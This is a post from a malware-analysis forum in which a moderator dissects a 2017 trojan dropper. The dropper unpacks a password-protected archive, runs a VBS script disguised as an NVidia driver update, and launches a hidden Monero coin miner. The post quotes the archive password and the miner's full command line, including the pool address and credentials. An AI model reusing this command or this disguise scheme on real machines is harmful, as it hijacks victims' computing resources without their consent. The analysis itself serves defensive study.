Forum for analysis and discussion about malware.
2 posts • Page 1 of 1
- Global Moderator
- Posts: 4860
- Joined: Sun Mar 07, 2010 5:35 am
- Location: Russian Federation
Trojan muldrop with coin miner as payload.ikolor wrote: ↑Sun Jan 01, 2017 1:18 pmPlease make selection ...2017
https://www.virustotal.com/en/file/ca2e ... 483276621/
SFX archive, next actual malware dropper -> extracts files to %UserProfile%\Public. Main malware inside password protected zip file called dokinz.zip. This zip file unpacked by ConsoleApplication1.exe (also dropped by malware) with password "dokinzakbar" (hardcoded inside ConsoleApplication1.exe). After unpacking ConsoleApplication1.exe executes malicious script NVidiaDriverUpdate.vbs
TL;DR it is cryptocurrency miner configured as
where NvidiaUpdater.exe is a coin miner called "cpuminer-multi".
Code: Select all
"NvidiaUpdater.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u firstname.lastname@example.org -p 2101skymagicss -t 1", 0, true
This email can be found in google and lead to russian Magnitogorsk.
Ring0 - the source of inspiration